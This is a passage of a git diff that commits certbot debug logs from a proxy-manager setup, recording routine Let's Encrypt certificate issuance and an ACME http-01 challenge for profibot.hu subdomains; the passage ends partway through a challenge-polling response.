+vIe87PVD/6NrFrOMtOw9FrkIMAoGCCqGSM49BAMDA2gAMGUCMAVicdAlQJmbHtq1 +GKKwmFcOd10qoxkmtn2vjgalK8gmwFu4Yxz4PTrh65f/2uWXUwIxAJhDz1Dzy/jK +cA+/NqjqmSk3ZHT641YWVkExSKlwyVDCRciScnh0dtTAieWoQ0eGWQ== +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw +CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg +R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y +NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy +eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM +ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET +oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO +BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG +A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK +MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw +JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK +MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v +cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls +5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4 +4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg== +-----END CERTIFICATE----- + +2026-01-19 23:24:06,439:DEBUG:acme.client:Storing nonce: LJ8hB_GOxyzCsUTWd8gXXz1WOid3nTkepYNA8rBsA_6kqlff818 +2026-01-19 23:24:06,448:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager +2026-01-19 23:24:06,449:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-15. +2026-01-19 23:24:06,449:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-15. +2026-01-19 23:24:06,450:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-15/cert.pem. +2026-01-19 23:24:06,450:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-15/privkey.pem. +2026-01-19 23:24:06,451:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-15/chain.pem. +2026-01-19 23:24:06,451:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-15/fullchain.pem. +2026-01-19 23:24:06,452:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-15/README. +2026-01-19 23:24:06,481:DEBUG:certbot.configuration:Var account=e417a583de478a0cfdeed332c1113068 (set by user). +2026-01-19 23:24:06,481:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). +2026-01-19 23:24:06,481:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). +2026-01-19 23:24:06,482:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). +2026-01-19 23:24:06,482:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). +2026-01-19 23:24:06,482:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). +2026-01-19 23:24:06,482:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). +2026-01-19 23:24:06,482:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). +2026-01-19 23:24:06,482:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-19 23:24:06,482:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-19 23:24:06,483:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). +2026-01-19 23:24:06,483:DEBUG:certbot.configuration:Var webroot_map={'code.profibot.hu': '/data/letsencrypt-acme-challenge'} (set by user). +2026-01-19 23:24:06,485:DEBUG:certbot._internal.display.obj:Notifying user: +Successfully received certificate. +Certificate is saved at: /etc/letsencrypt/live/npm-15/fullchain.pem +Key is saved at: /etc/letsencrypt/live/npm-15/privkey.pem +This certificate expires on 2026-04-19. +These files will be updated when the certificate renews. +2026-01-19 23:24:06,485:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: +2026-01-19 23:24:06,485:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. +2026-01-19 23:24:06,487:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: + * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate + * Donating to EFF: https://eff.org/donate-le diff --git a/proxy-manager/data/logs/letsencrypt.log.5 b/proxy-manager/data/logs/letsencrypt.log.5 new file mode 100755 index 0000000..9755ff1 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.5 @@ -0,0 +1,1032 @@ +2025-12-25 04:09:47,767:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-25 04:09:47,767:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-25 04:09:47,767:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-14', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'db.profibot.hu'] +2025-12-25 04:09:47,767:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-25 04:09:47,777:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-25 04:09:47,778:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 04:09:47,778:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-25 04:09:47,778:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-25 04:09:47,778:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-25 04:09:47,815:DEBUG:certbot._internal.main:Picked account: +2025-12-25 04:09:47,815:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-25 04:09:47,817:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-25 04:09:48,282:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-25 04:09:48,283:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:48 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "JhN-bGapPNE": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-25 04:09:48,284:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for db.profibot.hu +2025-12-25 04:09:48,290:DEBUG:acme.client:Requesting fresh nonce +2025-12-25 04:09:48,290:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-25 04:09:48,445:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-25 04:09:48,446:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:48 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJDyc0oabQjKcI0QI4ygS4cOJhcR_wu7-p7rJ17BDUfmw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-25 04:09:48,446:DEBUG:acme.client:Storing nonce: fULB7aUJDyc0oabQjKcI0QI4ygS4cOJhcR_wu7-p7rJ17BDUfmw +2025-12-25 04:09:48,447:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "db.profibot.hu"\n }\n ]\n}' +2025-12-25 04:09:48,450:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSkR5YzBvYWJRaktjSTBRSTR5Z1M0Y09KaGNSX3d1Ny1wN3JKMTdCRFVmbXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "PsidprrdkfnvaGVRXgq4bC9SERpuBFp-pWVrPA-QJEpNvqtJ8G6cy2I3WAi1JXNOmBF0zHfMvuM-vFECKHmGveyMMh2oc7BrFhSrLNOXuoQBtS4_L2XeBALzxn9YTYhfK_ye28ZtKVPmqlE28QHI1wIYfU6r7PCpd74UK9jf1lmTeKDRvNlbrmTQXi76eDH6PPcPV0QKpvUwLY_OwOVH417dcUpmEiCL5aVoY9PF7FWMNk4HGGvX9qTXCAgsQrsbYlAk_IhN8FPniz64qDxW2_FjvJgY0v-1n6Xr2KG7WBhEGpujrO0TUNiSe0-ImDqoFi6UJuZZs7Yba20VoctogA", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImRiLnByb2ZpYm90Lmh1IgogICAgfQogIF0KfQ" +} +2025-12-25 04:09:48,643:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 348 +2025-12-25 04:09:48,644:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:48 GMT +Content-Type: application/json +Content-Length: 348 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462430571446 +Replay-Nonce: fULB7aUJrYQOkVgVYA6yUnGFrIu6tLTy333hbXIS-l54k5iIGA8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "identifiers": [ + { + "type": "dns", + "value": "db.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462430571446" +} +2025-12-25 04:09:48,644:DEBUG:acme.client:Storing nonce: fULB7aUJrYQOkVgVYA6yUnGFrIu6tLTy333hbXIS-l54k5iIGA8 +2025-12-25 04:09:48,645:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:48,649:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnJZUU9rVmdWWUE2eVVuR0ZySXU2dExUeTMzM2hiWElTLWw1NGs1aUlHQTgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "FIkBs33qGe-iBSysPMMhoth8qNfkxQkAO08hLYOHv5HrbuaA0KreCDGPfEQtMo8w8FlqCXzSbP7dVx1UD1uZmCgfPcJ9gZwoMc7RWB__ytjxGFWiPq7FBebo3mx6psH14eSqYG4wtWY0EGPgenHDl_UGc3L5mIJMd89yfxBVjNexeT0FNm37ZKGH-safBVoRN4-iehDjv_h8XFRExnArnM4b5AFn9xD99tUCZqHfUN4QNYOpWggIvqTNC1x7q2ors7v0tVDTKKwQHcq6WH-PryTfog_0taILP3e9GEH8Od5GXRzBhx5dEFoxwNXTrwSqNFU70LrEX9MD1-rdr8lb2Q", + "payload": "" +} +2025-12-25 04:09:48,805:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:09:48,806:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:48 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJRGfmarfgPe0PhrijStt5ZKai-URo8A_U3fOIC1U6EcA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:09:48,806:DEBUG:acme.client:Storing nonce: fULB7aUJRGfmarfgPe0PhrijStt5ZKai-URo8A_U3fOIC1U6EcA +2025-12-25 04:09:48,807:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:09:48,808:INFO:certbot._internal.auth_handler:Performing the following challenges: +2025-12-25 04:09:48,808:INFO:certbot._internal.auth_handler:http-01 challenge for db.profibot.hu +2025-12-25 04:09:48,809:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2025-12-25 04:09:48,809:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2025-12-25 04:09:48,811:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ +2025-12-25 04:09:48,812:DEBUG:acme.client:JWS payload: +b'{}' +2025-12-25 04:09:48,815:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSlJHZm1hcmZnUGUwUGhyaWpTdHQ1WkthaS1VUm84QV9VM2ZPSUMxVTZFY0EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2L0J6SWFYQSJ9", + "signature": "gSyXLTZpxQltfvydbuc82dh_EcR42xuAWd7RbHlnzhanM-uvBrzVggNjfsHMPKgdIByGe4Y0e_8cWmGBM5y4JLt7d_Z4_CDDaLcwWDmqkuD1Sf4d3_lOgSoE3qjbXCzLeXx0jzMRDLSaUXOJaWFvQmSbiJzlmtcPyBqqaaVLSvhzf_k9lHXzukcL170BBNL81CH8CoGQEYDUK5QYkZNGZO4Zbdetb2Pp0t_aEiCqbl1CTxZGOWOJY1QHzRjAC0KZfLjVjRTOsxe0y87NL7R6iVO-5giwJY1BXuYkyOMMSY7ezW8-GrFp6Ww_b8R7EKy04oX4_0vayqyv9Qcv0445FA", + "payload": "e30" +} +2025-12-25 04:09:48,972:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/632668458316/BzIaXA HTTP/1.1" 200 195 +2025-12-25 04:09:48,973:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:48 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA +Replay-Nonce: 58tS3qjENDAlf1XMqNCvNAXQRlakLh3CgOolfJgLHxqoyLxNwtM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" +} +2025-12-25 04:09:48,974:DEBUG:acme.client:Storing nonce: 58tS3qjENDAlf1XMqNCvNAXQRlakLh3CgOolfJgLHxqoyLxNwtM +2025-12-25 04:09:48,974:INFO:certbot._internal.auth_handler:Waiting for verification... +2025-12-25 04:09:49,975:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:49,979:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRU5EQWxmMVhNcU5Ddk5BWFFSbGFrTGgzQ2dPb2xmSmdMSHhxb3lMeE53dE0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "MdD_c_iEm520SywBEfQewl67dI4MkqfV8HO4qwn18TktTajZvcWfqxlpAwvcwsCvix-yhlFGxYeOmwr05rQwE9vnIL9xuOQr50HPc60tw_mKegIJI2PGfz64a_Fi74hQ9a4JO9FKFXzmyBVkr8-kaQ_QXEQkgO5geabM-kM0gwR9v41NbCuFRtYmY4KNvJn1RA9TU8OnGgiBHP9weBMsAWn60motpgAByoFet6EFcgUYth4PNhWZBSJ_K1ijY13uvWW9g0EusaMATfVzmBnmVYJKwj9MXvF103yidETvr_dQx8X10pumEqnkAFD-d6wgxD154WEGY209PuDe-gkppQ", + "payload": "" +} +2025-12-25 04:09:50,135:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:09:50,136:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:50 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEwoHXmqO-HHT-QJ4KyWn_nwzfwblEJyIZoVKDf7yNR88 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:09:50,136:DEBUG:acme.client:Storing nonce: 58tS3qjEwoHXmqO-HHT-QJ4KyWn_nwzfwblEJyIZoVKDf7yNR88 +2025-12-25 04:09:50,137:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:09:53,138:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:53,142:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXdvSFhtcU8tSEhULVFKNEt5V25fbnd6ZndibEVKeUlab1ZLRGY3eU5SODgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "f322X8p9FRM-EmASQLAyMv23Jw43ss8fw5DCR2n4yQGVKgztFk9X7_ZxTtb38Al0z5jHEfIs5baU-ZmgaKCY5OrblLntiZwbr6QymRKtB3SMBkjPyS2mtXwI2lvxJIqhVZ4TOjwHQoxMKXisKqiLFcrUno7YViFwyZP9uFqZhpDtZ4IqwNTdfoU3vs14wZfG6A0eJG9OwtsOssT5b7y6nsrtjVYvt_fHk-HE2XzBPFlh9-kfQ8Kt0eyNuF4JCddwvoI8LAIyyLKLO3iPpfH6upkOfhh4n1rp0NrBohwZFPYgX8THT6rBFQlGAocfUmtiOtX9VqaBGk8B58Ij3J2Nqw", + "payload": "" +} +2025-12-25 04:09:53,298:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:09:53,299:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:53 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEaGDw3f5KNfHTVUzRbzBIJNjXTGtUkhmL4lCbKvI1G4o +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + } + ] +} +2025-12-25 04:09:53,300:DEBUG:acme.client:Storing nonce: 58tS3qjEaGDw3f5KNfHTVUzRbzBIJNjXTGtUkhmL4lCbKvI1G4o +2025-12-25 04:09:53,300:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ', 'status': 'pending', 'token': 'PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ'} +2025-12-25 04:09:56,301:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:56,305:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632668458316: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWFHRHczZjVLTmZIVFZVelJiekJJSk5qWFRHdFVraG1MNGxDYkt2STFHNG8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY4NDU4MzE2In0", + "signature": "PTmpfchSt-Uzw1lLkiRtasHC43KQbQY5K98bGkqF9PmpDv_zma4wjiUQoY7SFAjQ77avpYSIz5GI8GhC5nfBRSv-rshbKkgOgts4VhnbV8kEZQxGSOaBP51hFVYjZgG_ux0tUu7zqTAx3HeDUuHar4l5KIR-Ud4m4fZSMfiphpoQ6JRm1uVPSZPmH6eqepJRD7SOL2wukyjLql7W4hFPeq4NYTVwKSxv6TFlWpe_Dh7Qi5pooEkuEHl7vpnaziFwNmRMOozNviY9wrBabSd904Q14SHZ55WL-Y41Zcjngy5hv70wXQ405LLvtr1jyZEF7OZJWiEwp7K5odRNF6LHlA", + "payload": "" +} +2025-12-25 04:09:56,479:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632668458316 HTTP/1.1" 200 822 +2025-12-25 04:09:56,480:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:56 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJ2yCdOxesQkDCo2_dalrWMy3MrwKoO_BNN0pLZ_5H-tw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:09:48Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/oB79fQ", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/BzIaXA", + "status": "pending", + "token": "PgEkXeocXuPe-cV64fPMOX_BBl--rJ91KSxv7lR9WSQ" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632668458316/xrU-kA", + 